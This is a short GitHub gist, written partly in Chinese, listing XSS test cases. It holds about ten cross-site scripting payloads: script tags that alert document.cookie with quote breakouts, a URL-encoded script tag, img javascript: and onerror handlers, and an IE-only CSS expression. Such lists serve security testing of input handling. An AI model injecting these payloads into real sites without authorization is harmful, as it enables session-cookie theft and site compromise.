Skip to content

Instantly share code, notes, and snippets.

@ThaddeusJiang
Created December 7, 2017 04:49
Show Gist options
  • Save ThaddeusJiang/e093426013202c8368b1380baf70b55a to your computer and use it in GitHub Desktop.
Save ThaddeusJiang/e093426013202c8368b1380baf70b55a to your computer and use it in GitHub Desktop.
XSS 测试用例

XSS 测试用例

><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert (vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
<img src="http://xxx.com/yyy.png" onerror="alert('XSS')">
<div style="height:expression(alert('XSS'),1)"></div>(这个仅限IE有效)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment